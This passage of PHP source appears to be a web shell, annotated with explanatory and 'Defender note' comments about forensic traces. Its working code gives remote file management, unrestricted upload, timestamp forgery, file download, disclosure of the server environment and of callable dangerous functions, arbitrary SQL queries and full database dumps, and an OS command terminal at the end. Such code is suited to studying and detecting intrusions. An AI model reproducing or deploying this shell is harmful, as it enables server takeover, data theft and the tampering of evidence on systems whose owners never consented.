",
php_uname(),server_software,
server_name,server_name,gethostbyname(http_host),server_port,
B64D($account[0]),remote_addr,remote_port,
GetUser("usr"),GetUser("uid"),GetUser("grp"),GetUser("gid"),
GetFileSize(@disk_free_space($dir)),GetFileSize(@disk_total_space($dir)),
php_sapi_name(),GetSafeMode(),php_self,$config['title'],$config['tagline'],
MainMenu(),MapDrive($map),MapDirectory($map),$map
);
// "g" (go-to-path) dispatcher of this web shell: redirects to the directory
// listing, the file viewer, or the landing page depending on what the
// requested path is.
// $g is taken straight from $_REQUEST and is only probed with
// is_dir()/is_file()/is_link(); no base-directory restriction is visible here.
// any(), urle() and the php_self constant are defined outside this view.
if(any("g",$_REQUEST))
{
$g=$_REQUEST['g'];
if (is_dir($g))
{
// Existing directory: hand off to the "d" (directory listing) handler.
header('location:'.php_self.'?d='.urle($g));
}
elseif(is_file($g)||is_link($g))
{
// Regular file or symlink: hand off to the "a=v" (view) action.
header('location:'.php_self.'?a=v&r='.urle($g));
}
else
{
// Anything else falls back to the script's own URL.
header('location:'.php_self);
}
// No exit follows the header() calls, so the handlers below still run.
}
// "d" directory-browser handler; also runs when request_uri equals script_name
// (both are constants defined outside this view).
// It first processes three write operations against $dir (new file, new
// directory, upload) and then renders the directory listing. $dir is assigned
// outside this view; "_" is a constant used as the path separator
// (presumably DIRECTORY_SEPARATOR — confirm).
// Defender note: files and directories created here are on-disk artefacts of
// the intrusion; new or changed files under the web root owned by the web
// server account are the thing to hunt for.
if(any("d",$_REQUEST)||request_uri===script_name)
{
// Remember the current directory in the session, encoded with urle().
$_SESSION['c']=urle($dir);
if(any("file",$_REQUEST)&&$_REQUEST['file']=="New File")
{
// The name from "what" is appended to $dir as-is; only trim() is applied.
$file=trim($dir._.$_REQUEST['what']);
if(file_exists($file))
{
printf("
Can't create New File!");
}
else
{
// Create an empty file, then redirect to the edit action (a=e) for it.
$mf=@fopen($file,"w");
fclose($mf);
header("location:".php_self."?a=e&r=".urle($file));
}
}
if(any("directory",$_REQUEST)&&$_REQUEST['directory']=="New Dir")
{
// mkdir() is called with the request value after chdir($dir), so a
// relative name is created inside the current listing directory.
$dire=trim($_REQUEST['what']);
@chdir($dir);
if(!@mkdir($dire))
{
printf("
Can't create New Directory!");
}
else
{
printf("
Directory '%s' Created on %s",$dire,GetFileTime($dir._.$dire,'create'));
}
}
if(any("upload",$_REQUEST)&&$_REQUEST['upload']=="Upload")
{
// Upload: only basename() and trim() are applied to the client-supplied
// name; no extension, size or content check is visible in this block.
$upload=$dir._.trim(basename($_FILES["what"]["name"]));
if(move_uploaded_file($_FILES["what"]["tmp_name"],$upload))
{
printf("
File %s has been uploaded",basename($_FILES["what"]["name"]));
}
else
{
printf("
✕ Can't upload new file! ✕");
}
}
if($handle=@opendir($dir))
{
// One pre-rendered row per directory entry, plus running counters.
$reads=array();
$count_dirs=0;
$count_files=0;
while(false!==($file=readdir($handle)))
{
$filedir=rtrim($dir,_)._.$file;
// Parent directory of $dir; short results (<= 2 chars) get the separator
// re-appended. $updir is not referenced again in the visible code.
$updir=substr($dir,0,strrpos($dir,_));
if (strlen($updir)<=2) $updir=$updir._;
// Per-entry metadata; the Get* helpers are defined outside this view.
$type=GetFileType($filedir);
$size=GetFileSize(@filesize($filedir));
$last=GetFileTime($filedir,"modify");
$perm=GetFilePerm($filedir);
$owner=GetOwnerGroup($filedir);
$mime=@mime_content_type($filedir);
// Pick the viewer variant (w=i image, w=v video, w=a audio) from the MIME
// type. $view is not used in the row strings as they appear in this copy
// (presumably it fed link markup that was lost in extraction).
$view="";
if(strpos($mime,'image')!==false)
{
$view="?a=v&w=i&r=".urle($filedir);
}
elseif(strpos($mime,'video')!==false)
{
$view="?a=v&w=v&r=".urle($filedir);
}
elseif(strpos($mime,'audio')!==false)
{
$view="?a=v&w=a&r=".urle($filedir);
}
else
{
$view="?a=v&r=".urle($filedir);
}
// "." and ".." get their own rows and are not counted.
if($file==".")
{
$reads[]="
| . | ".$type." | ".$size." | ".$perm." | ".$owner." | ".$last." | ✘ ℳ |
";
}
elseif($file=="..")
{
$reads[]="
| ".$file." | ".$type." | ".$size." | ".$perm." | ".$owner." | ".$last." | ✘ ℳ |
";
}
else
{
if($type=="dir")
{
$reads[]="
| ".$file." | ".$type." | ".$size." | ".$perm." | ".$owner." | ".$last." | ✘ ℳ |
";
$count_dirs++;
}
else
{
$reads[]="
| ".$file." | ".$type." | ".$size." | ".$perm." | ".$owner." | ".$last." | ℳ ✘ ➥ |
";
$count_files++;
}
}
}
// Rows are sorted as plain strings, then concatenated for output.
sort($reads);
$filesdirs="";
foreach($reads as $read)
{
$filesdirs.=$read;
}
printf("
",
urle($dir),
urle($dir),
urle($dir),
$filesdirs,
$count_dirs,
$count_files
);
closedir($handle);
}
else
{
print "
Can't Open Location";
}
}
if(any("r",$_REQUEST))
{
if(file_exists(urld($_REQUEST["r"])))
{
// File-detail view for the path given in "r": decodes the path, prints its
// metadata, and builds the per-file action menu.
// urld() and the Get* helpers are defined outside this view.
$file=strval(urld($_REQUEST["r"]));
// One-shot status message carried over from a previous action via the session.
$status=any("status",$_SESSION)?$_SESSION['status']:"";
$back=php_self."?d=".urle($dir);
// Metadata table; md5_file()/sha1_file() hash the target's full contents.
printf("
Name | %s |
Size | %s |
Permission | %s |
Create time | %s |
Last modified | %s |
Last accessed | %s |
MIME | %s |
Owner/Group | %s |
MD5 | %s |
SHA1 | %s |
",
basename($file),
GetFileSize(@filesize($file)),
GetFilePerm($file),
GetFileTime($file,"create"),
GetFileTime($file,"modify"),
GetFileTime($file,"access"),
mime_content_type($file),
GetFileOwnerGroup($file),
@md5_file($file),
@sha1_file($file)
);
// Menu label => query-string prefix. The "a" value selects the action handled
// further down (e edit, v view, cp copy, mv move, d download, h hexdump,
// c chmod, cwn chown, cgp chgrp, t touch, r rename, x delete).
if(is_file($file)||is_link($file))
{
$menu=array(
"Back" => "?a=b&r=",
"Edit" => "?a=e&r=",
"View" => "?a=v&r=",
"Copy" => "?a=cp&r=",
"Move" => "?a=mv&r=",
"Download" => "?a=d&r=",
"Hexdump" => "?a=h&r=",
"Chmod" => "?a=c&r=",
"Chown" => "?a=cwn&r=",
"Chgrp" => "?a=cgp&r=",
"Touch" => "?a=t&r=",
"Rename" => "?a=r&r=",
"Delete" => "?a=x&r="
);
}
elseif(is_dir($file))
{
// Directories get the subset of actions that do not read file contents.
$menu=array(
"Back" => "?a=b&r=",
"Chmod" => "?a=c&r=",
"Chown" => "?a=cwn&r=",
"Chgrp" => "?a=cgp&r=",
"Touch" => "?a=t&r=",
"Rename" => "?a=r&r=",
"Delete" => "?a=x&r="
);
}
$nu="";
foreach($menu as $key => $val)
{
// Split "?a=XX&r=" into the parameter name ("a") and its value ("XX") to
// mark the entry matching the current request as active.
$idxkey=substr($val,1,1);
$idxval=substr($val,3,strpos($val,'&')-3);
$active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":"";
// The three branches append identical text in this copy; presumably they
// differed in link markup that was lost in extraction.
if($key=="Delete")
{
$nu.="
".$key."";
}
elseif($key=="Back")
{
$nu.="
".$key."";
}
else
{
$nu.="
".$key."";
}
}
printf("",$nu);
// a=e — in-browser file editor.
// Shows the file (HTML-escaped) unless it is larger than 5242880 bytes (5 MiB),
// and on "save" overwrites it with the request's "sourcecode" value.
// Defender note: the save path changes the file mode to 0755 and rewrites the
// content, so unexpected mode/mtime/hash changes on web content are the trace
// it leaves; file-integrity monitoring on the web root catches this.
if($_REQUEST['a']=='e')
{
$source="";
if(filesize($file) > 5242880)
{
$source.="Lazy to Read more than 5MB Files";
}
else
{
$open=fopen($file,'r');
if($open)
{
// Read in 4 KiB chunks, escaping each chunk for display.
while(!feof($open))
{
$source.=htmlentities(fread($open,(1024*4)));
}
fclose($open);
}
}
printf("
",$source,$status);
// The status message is shown once and then dropped from the session.
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("save",$_REQUEST))
{
$new_source=$_REQUEST['sourcecode'];
// Force the mode to 0755 before writing.
if(function_exists("chmod")) chmod($file,0755);
// 'w+' truncates the file; the request body replaces it wholesale.
$source_edit=fopen($file,'w+');
$tulis=fwrite($source_edit,$new_source);
fclose($source_edit);
if($tulis)
{
$_SESSION['status']="File Saved ! ".GetFileTime($file,"modify")." | ".GetFileSize(filesize($file));
}
else
{
$_SESSION['status']="Whoops, something went wrong...";
}
// Redirect back to the editor so the stored status message is displayed.
header("location:".php_self."?a=e&r=".urle($file));
}
}
// a=r — rename form and handler.
// The new name from the request is joined to the file's current directory with
// only trim() applied, so it is not limited to a bare file name.
if($_REQUEST['a']=='r')
{
printf("
",basename($file),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("rename",$_REQUEST))
{
$path=pathinfo(trim($file));
$newname=$path['dirname']._.trim($_REQUEST['name']);
if(!rename(trim($file),$newname))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Renamed file with success';
}
// Redirects to the new name whether or not rename() succeeded.
header("location:".php_self."?a=r&r=".urle($newname));
}
}
// a=c — chmod form and handler.
// Displays the current mode (octal, first two digits of the fileperms() value
// dropped) and applies the request's "octal" string via octdec().
if($_REQUEST['a']=='c')
{
printf("
",substr(decoct(fileperms($file)),2),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("chmod",$_REQUEST))
{
// No range check on the mode: any value octdec() yields is passed to chmod().
$octal=octdec($_REQUEST['octal']);
if(!chmod(trim($file),$octal))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Chmod file with success';
}
header("location:".php_self."?a=c&r=".urle($file));
}
}
// a=cwn — chown form and handler.
// The displayed owner is looked up from $x, which is not assigned anywhere in
// the visible code; the change itself operates on $file.
if($_REQUEST['a']=='cwn')
{
$own='';
if(function_exists('posix_getpwuid'))
{
$user=posix_getpwuid(fileowner($x));
$own=$user['name'];
}
printf("
",$own,$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("chown",$_REQUEST))
{
// New owner comes from the request unchanged.
$own=$_REQUEST['own'];
if(!chown(trim($file),$own))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Chown file with success';
}
header("location:".php_self."?a=cwn&r=".urle($file));
}
}
// a=cgp — chgrp form and handler; mirrors the chown handler.
// As there, the displayed group is looked up from $x, which is not assigned in
// the visible code; the change itself operates on $file.
if($_REQUEST['a']=='cgp')
{
$grp='';
if(function_exists('posix_getgrgid'))
{
$group=posix_getgrgid(filegroup($x));
$grp=$group['name'];
}
printf("
",$grp,$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("chgrp",$_REQUEST))
{
// New group comes from the request unchanged.
$grp=$_REQUEST['grp'];
if(!chgrp(trim($file),$grp))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Chgrp file with success';
}
header("location:".php_self."?a=cgp&r=".urle($file));
}
}
// a=t — timestamp editor ("touch").
// Sets the file's modification time to whatever strtotime() parses from the
// request's "time" value.
// Defender note: because of this handler, mtime on files the shell could
// reach is not trustworthy evidence during triage. touch() rewrites
// atime/mtime only; the inode change time is set by the kernel, so an mtime
// that predates ctime is worth a closer look.
if($_REQUEST['a']=='t')
{
printf("
",GetFileTime($file,"modify"),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("touch",$_REQUEST))
{
$time=$_REQUEST['time'];
if(!touch(trim($file),strtotime($time)))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Touched file with success';
}
header("location:".php_self."?a=t&r=".urle($file));
}
}
// a=v — file viewer.
// With "w" set it emits an embed for the file's URL (f frame, i image,
// v video, a audio — the markup itself is not visible in this copy);
// without "w" it prints the syntax-highlighted source of files up to 5 MiB.
// GetUrlFromPath() is defined outside this view.
if($_REQUEST['a']=='v')
{
printf("",
urle($file),urle($file),
urle($file),urle($file),
urle($file));
if(is_readable($file))
{
if(any("w",$_REQUEST))
{
$url=GetUrlFromPath($file);
// File extension, passed to the video/audio output as a format argument.
$type=end(explode(".",$file));
if($_REQUEST['w']=='f')
{
printf("
--> New Tab <--",$url,$url);
}
if($_REQUEST['w']=='i')
{
printf("
",$url);
}
if($_REQUEST['w']=='v')
{
printf("
",$url,$type);
}
if($_REQUEST['w']=='a')
{
printf("
",$url,$type);
}
}
else
{
if(filesize($file) > 5242880)
{
printf("Lazy to Read more than 5MB Files");
}
else
{
// highlight_file(..., true) returns the highlighted source as a string,
// so any readable file — configuration files included — is disclosed.
$code=highlight_file($file,true);
printf("
%s
",$code);
}
}
}
}
// a=h — hex dump of the file, 32 bytes per row.
// $h[0] collects row offsets, $h[1] the hex bytes, $h[2] the printable column.
// The whole file is loaded into memory with file_get_contents(); unlike the
// edit and view actions there is no size limit here.
if($_REQUEST['a']=='h')
{
$c=file_get_contents($file);
$n=0;
$h=array('00000000
','','');
$len=strlen($c);
for($i=0;$i<$len;++$i)
{
$h[1].=sprintf('%02X',ord($c[$i])).' ';
// NUL, TAB, LF and CR are shown as a space in the text column.
switch(ord($c[$i]))
{
case 0: $h[2].=' ';break;
case 9: $h[2].=' ';break;
case 10:$h[2].=' ';break;
case 13:$h[2].=' ';break;
default:$h[2].=$c[$i];break;
}
$n++;
if($n==32)
{
// End of a 32-byte row: emit the next offset (if more data follows)
// and break the hex and text columns.
$n=0;
if($i+1 < $len)
{
$h[0].=sprintf('%08X',$i+1).'
';
}
$h[1].='
';
$h[2].="\n";
}
}
// Only the text column is HTML-escaped; offsets and hex are generated locally.
printf("
",$h[0],$h[1],htmlspecialchars($h[2]));
}
// a=cp / a=mv — copy or move a single file to the request's "file-dest" path.
// Move is implemented as copy() followed by Remove() of the source
// (Remove() is defined outside this view). An existing destination is never
// overwritten.
if($_REQUEST['a']=='cp'||$_REQUEST['a']=='mv')
{
printf("
",$file,($_REQUEST['a']=='cp'?'Copy':'Move'),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("submit",$_REQUEST))
{
$source=$file;
// Destination comes from the request; only trim() is applied before use.
$dest=$_REQUEST['file-dest'];
if(!file_exists($dest))
{
if ($_REQUEST['a']=='cp')
{
if(!copy(trim($source),trim($dest)))
{
$_SESSION['status']='Whoops, cannot copying...';
}
else
{
$_SESSION['status']="Copy file with success
'" . basename($dest) . "'";
}
}
elseif($_REQUEST['a']=='mv')
{
if(!copy(trim($source),trim($dest)))
{
$_SESSION['status']='Whoops, cannot moving...';
}
else
{
if(Remove($source))
{
$_SESSION['status']="Move file with success";
// After a successful move the redirect below targets the new path.
$file=$dest;
}
else
{
// Copy succeeded but the source could not be removed.
$_SESSION['status']='Whoops, just copying...';
}
}
}
}
else
{
$_SESSION['status']="Whoops, File was Exists
'" . basename($dest) . "'";
}
if($_REQUEST['a']=='cp')
{
header("location:".php_self."?a=cp&r=".urle($file));
}
elseif($_REQUEST['a']=='mv')
{
header("location:".php_self."?a=mv&r=".urle($file));
}
}
}
// a=d — download: streams the file to the client as an attachment and exits.
// Defender note: this is the shell's file-exfiltration path. On the wire it is
// an application/octet-stream response with a Content-Disposition attachment
// header coming from a PHP script URL.
if($_REQUEST['a']=='d')
{
if(file_exists($file))
{
header('Cache-Control:must-revalidate,post-check=0,pre-check=0');
header('Content-Disposition:attachment;filename='.basename($file));
header('Content-Type:application/octet-stream');
header('Content-Description:File Transfer');
header('Content-Transfer-Encoding:binary');
header('Content-Length:'.filesize($file));
header('Pragma:public');
header('Expires:0');
// Discard anything already buffered so only the file bytes are sent.
ob_clean();
readfile($file);
exit;
}
}
// a=x — delete the file or directory via Remove() (defined outside this view)
// and redirect back to the containing directory listing.
if($_REQUEST['a']=='x')
{
if(file_exists($file))
{
if(Remove($file))
{
header("location:".$back);
}
}
// Reached on every path (no exit after the redirect), so the message is
// printed even when the delete succeeded.
print '
Cannot Delete';
}
}
else
{
print '
File Not Found';
}
}
if(any("x",$_REQUEST))
{
// x=logout — ends the operator's session and returns to the login page.
// session_regenerate_id() is called after session_destroy(), i.e. when there
// is no longer an active session.
if($_REQUEST['x']=="logout")
{
session_destroy();
session_regenerate_id();
header('location:'.php_self);
}
// x=secure — hardening reconnaissance.
// Reads the host's disable_functions setting, merges it with a built-in list
// of sensitive names, and classifies every entry as DIE (listed in
// disable_functions), READY (exists / callable) or OFF (neither).
// Defender note: the report shows which execution, file and socket primitives
// the PHP runtime still exposes, so the same list doubles as a checklist for
// disable_functions review. Note that several entries are ini settings or
// non-existent names rather than functions and will always report OFF.
if($_REQUEST['x']=="secure")
{
// Functions already disabled in php.ini, trimmed, empty entries dropped.
$disable_functions=array_filter(array_map('trim',explode(',',ini_get("disable_functions"))));
$security=array('_xyec','allow_url_fopen','allow_url_include','apache_child_terminate','apache_get_modules','apache_getenv',
'apache_note','apache_setenv','base64_decode','chdir','chgrp','chmod','chown','curl_exec','curl_multi_exec','dbase_open',
'dbmopen','define_syslog_variables','disk_free_space','disk_total_space','diskfreespace','dl','dlopen','escapeshellarg',
'escapeshellcmd','eval','exec','extract','filepro','filepro_retrieve','filepro_rowcount','fopen_with_path','fp','fput',
'fputs','ftp_connect','ftp_exec','ftp_get','ftp_login','ftp_nb_fput','ftp_put','ftp_raw','ftp_rawlist','geoip_open',
'get_cfg_var','get_current_user','get_num_redirects','getcwd','getenv','getlastmo','getmygid','getmyinode','getmypid',
'getmyuid','getrusage','gzinflate','gzuncompress','highlight_file','hpAds_xmlrpcEncode','ini_alter','ini_get_all',
'ini_restore','ini_set','inject_code','leak','link','listen','mainwork','mb_send_mail','mkdir','mkfifo','move_uploaded_file',
'mysql_list_dbs','mysql_pconnect','openlog','parse_ini_file','passthru','pcntl_alarm','pcntl_exec','pcntl_fork',
'pcntl_get_last_error','pcntl_getpriority','pcntl_setpriority','pcntl_signal','pcntl_signal_dispatch','pcntl_sigprocmask',
'pcntl_sigtimedwait','pcntl_sigwaitinfo','pcntl_strerrorp','pcntl_wait','pcntl_waitpid','pcntl_wexitstatus','pcntl_wifexited',
'pcntl_wifsignaled','pcntl_wifstopped','pcntl_wstopsig','pcntl_wtermsig','pfsockopen','phpAds_XmlRpc','phpAds_remoteInfo',
'phpAds_xmlrpcDecode','phpAds_xmlrpcEncode','php_uname','phpinfo','popen','posix_getgrgid','posix_getlogin','posix_getpwuid',
'posix_kill','posix_mkfifo','posix_setpgid','posix_setsid','posix_setuid','posix_ttyname','posix_uname','posixc','proc_close',
'proc_get_stats','proc_get_status','proc_nice','proc_open','proc_terminate','ps_aux','putenv','readlink','rename','rmdir',
'runkit_function_rename','set_time_limit','sh2_exec','shell_exec','show_source','sleep','socket_accept','socket_bind',
'socket_clear_error','socket_close','socket_connect','socket_create','socket_create_listen','socket_create_pair',
'socket_get_option','socket_getpeername','socket_getsockname','socket_last_error','socket_listen','socket_read',
'socket_recv','socket_recvfrom','socket_select','socket_send','socket_sendto','socket_set_block','socket_set_nonblock',
'socket_set_option','socket_shutdown','socket_strerror','socket_write','str_rot13','stream_select','stream_socket_server',
'symlink','syslog','system','tp_exec','virtual','xmlrpc_entity_decode');
sort($security);
// Union of the host's disabled list and the built-in list, de-duplicated.
$fucks=array_unique(array_merge($disable_functions,$security));
$table="";
$enable=0;
$disable=0;
$die=array();
$ready=array();
$off=array();
$total=count($fucks);
foreach($fucks as $fuck)
{
$table.="
| $fuck | ";
if(in_array($fuck,$disable_functions))
{
// Explicitly disabled by configuration.
$table.="DIE";
$die[]=$fuck;
$disable++;
}
else
{
if(function_exists($fuck)||is_callable($fuck))
{
// Present and callable in this runtime.
$table.="READY";
$ready[]=$fuck;
$enable++;
}
else
{
// Not disabled by configuration, but not available either.
$table.="OFF";
$off[]=$fuck;
$disable++;
}
}
$table.=" |
";
}
// Percentages of callable vs. unavailable entries over the merged list.
$risk=($enable/$total)*100;
$secure=($disable/$total)*100;
printf("
Sec. Info v2.0.%s
Risks Rate [%s%%] | Secure Rate [%s%%]
No. |
Disable Function |
Status |
%s
",$total,round($risk,2),round($secure,2),$table,implode($ready, ', '),implode($off, ', '),implode($die, ', '));
}
// x=info — environment disclosure.
// Prints the values of a fixed list of PHP core constants and, when
// xa=envirolment (sic) is sent, the output of phpinfo() for the section mask
// given in the request's "config" value.
if($_REQUEST['x']=="info")
{
printf("
");
$cores=array('PHP_VERSION','PHP_MAJOR_VERSION','PHP_MINOR_VERSION','PHP_RELEASE_VERSION','PHP_VERSION_ID',
'PHP_EXTRA_VERSION','PHP_ZTS','PHP_DEBUG','PHP_MAXPATHLEN','PHP_OS','PHP_OS_FAMILY','PHP_SAPI',
'PHP_EOL','PHP_INT_MAX','PHP_INT_MIN','PHP_INT_SIZE','PHP_FLOAT_DIG','PHP_FLOAT_EPSILON',
'PHP_FLOAT_MIN','PHP_FLOAT_MAX','DEFAULT_INCLUDE_PATH','PEAR_INSTALL_DIR','PEAR_EXTENSION_DIR',
'PHP_EXTENSION_DIR','PHP_PREFIX','PHP_BINDIR','PHP_BINARY','PHP_MANDIR','PHP_LIBDIR','PHP_DATADIR',
'PHP_SYSCONFDIR','PHP_LOCALSTATEDIR','PHP_CONFIG_FILE_PATH','PHP_CONFIG_FILE_SCAN_DIR',
'PHP_SHLIB_SUFFIX','PHP_FD_SETSIZE');
$table="";
foreach($cores as $core)
{
// @ hides the error for constants that this PHP build does not define.
$table.="
".$core." | ".@constant($core)." |
";
}
printf("
Core Predefined Constants
Predefined Constants |
Value |
%s
",$table);
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="envirolment")
{
// Capture phpinfo() from the output buffer, post-process it with a regex
// (the pattern appears to have lost its original markup in this copy),
// print the result and stop.
ob_clean();
phpinfo($_REQUEST['config']);
$phpinfo=ob_get_contents();
ob_end_clean();
$phpinfo=preg_replace('%^.*(.*).*$%ms','$1',$phpinfo);
printf("
%s
",$phpinfo);
exit;
}
}
if($_REQUEST['x']=="db")
{
// Database client, state and landing view.
// Connection parameters live in the session (host, user, pass, ...), written
// by the xa=db step further down.
$connect=any("connect",$_SESSION)?$_SESSION['connect']:"";
$status=any("status",$_SESSION)?$_SESSION['status']:"";
$query=any("query",$_REQUEST)?$_REQUEST['query']:"show databases;";
if($connect=='true')
{
// Connected: list the server's running processes. This path uses the legacy
// mysql_* API, while the other database paths in this file use mysqli_*.
$process="";
$sql=mysql_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass']);
$result=mysql_list_processes($sql);
while($row=mysql_fetch_assoc($result))
{
$process.=sprintf("
%s | %s | %s |
%s | %s |
",
$row["Id"],$row["Host"],$row["db"],
$row["Command"],$row["Time"]);
}
mysql_free_result($result);
printf("
",$query,$process,$dir,$status);
}
else
{
// Not connected: print the connection form (markup not visible in this copy).
printf("
");
}
// "rs" blanks a session entry whose key is chosen by the request.
if(any("rs",$_REQUEST))
{
$_SESSION[$_REQUEST['rs']]='';
}
// "cd" / "ct" remember the selected database and table for the breadcrumb.
if(any("cd",$_REQUEST))
{
$_SESSION['qdb']=$_REQUEST['cd'];
}
if(any("ct",$_REQUEST))
{
$_SESSION['qtb']=$_REQUEST['ct'];
}
// xa=db — connect step: tries a MySQL connection with request-supplied
// host/user/pass/database/port and stores all of them in the session.
// Defender note: the host is caller-chosen, so this produces outbound MySQL
// connections from the web server to arbitrary hosts, and the database
// credentials the operator enters sit in PHP session storage in clear text.
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="db")
{
$cn=mysqli_connect($_REQUEST['host'],$_REQUEST['user'],$_REQUEST['pass'],$_REQUEST['dbas'],$_REQUEST['port']);
// Parameters are stored before the result of the attempt is checked.
$_SESSION['host']=$_REQUEST['host'];
$_SESSION['port']=$_REQUEST['port'];
$_SESSION['user']=$_REQUEST['user'];
$_SESSION['pass']=$_REQUEST['pass'];
$_SESSION['dbas']=$_REQUEST['dbas'];
if($cn)
{
$_SESSION['connect']='true';
header('location:'.php_self.'?x=db');
}
else
{
$_SESSION['connect']='false';
printf("
Connection Failed");
}
}
// xa=qry — runs the request's "query" string verbatim against the stored
// connection and renders the result set as a table.
// Defender note: every statement the operator types is executed with the
// privileges of the stored database account; database audit or general query
// logs are where this activity shows up.
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="qry")
{
$_SESSION['status']='';
$con=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']);
if(isset($_REQUEST['disconnect']))
{
// Disconnect: close the link and drop the connection state from the
// session. 'port' is not among the keys removed. No exit follows the
// redirect, so the query code below still runs.
mysqli_close($con);
unset($_SESSION['connect']);
unset($_SESSION['query']);
unset($_SESSION['host']);
unset($_SESSION['user']);
unset($_SESSION['pass']);
unset($_SESSION['dbas']);
unset($_SESSION['qdb']);
unset($_SESSION['qtb']);
header('location:'.php_self.'?x=db');
}
$sql=!empty($_REQUEST['query'])?$_REQUEST['query']:"show databases;";
$result=mysqli_query($con,$sql);
// $data[0] is the list of column names; the following entries are the rows.
$data=array();
$name=array();
if($result)
{
while($fieldinfo=mysqli_fetch_field($result))
{
$name[]=$fieldinfo->name;
}
$data[]=$name;
while($row=mysqli_fetch_row($result))
{
$data[]=$row;
}
mysqli_free_result($result);
}
else
{
$data=false;
}
if($data!==false)
{
// Breadcrumb: "Database" plus the remembered database and table names.
$sqdb=@$_SESSION['qdb'];
$sqtb=@$_SESSION['qtb'];
$bsdb="
Database";
$bqdb=!empty($_SESSION['qdb'])?"→
$sqdb":"";
$bqtb=!empty($_SESSION['qtb'])?"→
$sqtb":"";
printf("
%s %s %s
",$bsdb,$bqdb,$bqtb);
foreach($data as $key => $val)
{
if(is_array($val))
{
if($key==0)
{
// Header row.
print "☰ | ";
foreach($val as $key2 => $val2)
{
if(!is_array($val2))
{
print "".$val2." | ";
}
}
print "
";
}
else
{
// Data row. $val2 still holds the LAST column name from the header
// loop; it decides how each cell is rendered (database list, table
// list, or plain value). The three branches print the same text in this
// copy — presumably they differed in link markup lost in extraction.
// Cell values are printed as returned by the server.
print " | ";
foreach($val as $key3 => $val3)
{
if(!is_array($val3))
{
if(strpos($val2,'Database')!==false)
{
print "$val3 | ";
}
elseif(strpos($val2,'Tables')!==false)
{
// Database name taken from a "Tables_in_<db>" column header.
$val4=substr($val2,strpos($val2,'Tables_in_')+10);
print "$val3 | ";
}
else
{
print "$val3 | ";
}
}
}
print "
";
}
}
}
print "
";
}
else
{
print '
Query not Executed';
}
}
// xa=dmp — dumps every table of the chosen database into a .sql file on the
// web server's filesystem, at the path given in the request's "output" value.
// Defender note: this stages a full database copy on disk for later download;
// unexpected *.sql files written by the web server account, and full-table
// SELECTs over all tables in quick succession, are the traces to look for.
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="dmp")
{
$database=$_REQUEST['database'];
$output=$_REQUEST['output'];
// Refuses to run when the output path already exists or no database is named.
if (!file_exists($output)&&!empty($database))
{
$link=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],null,$_SESSION['port']);
mysqli_set_charset($link,'utf8');
mysqli_select_db($link,$database);
$tables=array();
$result=mysqli_query($link,'SHOW TABLES');
while($row=mysqli_fetch_row($result))
{
$tables[]=$row[0];
}
// Dump preamble.
$return='SET FOREIGN_KEY_CHECKS=0;' . "\r\n";
$return.='SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";' . "\r\n";
$return.='SET AUTOCOMMIT=0;' . "\r\n";
$return.='START TRANSACTION;' . "\r\n";
foreach($tables as $table)
{
// Table names are concatenated into the statements without quoting.
$result=mysqli_query($link,'SELECT * FROM '.$table);
$num_fields=mysqli_num_fields($result);
$num_rows=mysqli_num_rows($result);
$i_row=0;
// Column 1 of SHOW CREATE TABLE is the CREATE statement itself.
$row2=mysqli_fetch_row(mysqli_query($link,'SHOW CREATE TABLE '.$table));
$return.="\n\n".$row2[1].";\n\n";
if ($num_rows!==0) {
$row3=@mysqli_fetch_fields($result);
$return.='INSERT INTO '.$table.'( ';
foreach ($row3 as $th)
{
$return.='`'.$th->name.'`,';
}
// Cuts the last two characters of the column list built above.
$return=substr($return,0,-2);
$return.=' ) VALUES';
// The inner while consumes the whole result set on the first pass of
// this for loop; later passes find no rows left.
for ($i=0;$i < $num_fields;$i++)
{
while($row=mysqli_fetch_row($result))
{
$return.="\n(";
for($j=0;$j<$num_fields;$j++)
{
// Values are escaped with addslashes() and newlines are rewritten
// as the two characters "\n"; every value is emitted as a quoted
// string.
$row[$j]=addslashes($row[$j]);
$row[$j]=preg_replace("#\n#","\\n",$row[$j]);
if (isset($row[$j])) { $return.='"'.$row[$j].'"';}else { $return.='""';}
if ($j<($num_fields-1)) { $return.=',';}
}
// Last row closes the statement; other rows are comma-separated.
if (++$i_row==$num_rows) {
$return.=");";
}else {
$return.="),";
}
}
}
}
$return.="\n\n\n";
}
$return .='SET FOREIGN_KEY_CHECKS=1;' . "\r\n";
$return.='COMMIT;';
// Force a ".sql" extension on the output path, then write the dump.
$output=end(explode(".",$output))=='sql'?$output:$output.'.sql';
$handle=fopen($output,'w+');
fwrite($handle,$return);
fclose($handle);
$_SESSION['status']=sprintf("Dump with success...
'%s'",urle($output),basename($output));
}
else
{
$_SESSION['status']="
Dump Error";
}
header('location:'.php_self.'?x=db');
}
}
// x=terminal — operating-system command execution.
// The request's "cmd" value is handed unchanged to Execute() (defined outside
// this view; presumably a wrapper around PHP's process-execution functions —
// confirm) and the output is returned to the client.
// Defender note: this is the highest-impact capability in the file. The most
// reliable detection is at the host: shell or utility processes (whoami, ps,
// tasklist, ...) spawned as children of the web server / PHP worker process.
// Disabling process-execution functions in php.ini limits this path.
if($_REQUEST['x']=="terminal")
{
// The page itself already runs "whoami" to label the prompt.
printf("
",Execute('whoami'),$dir);
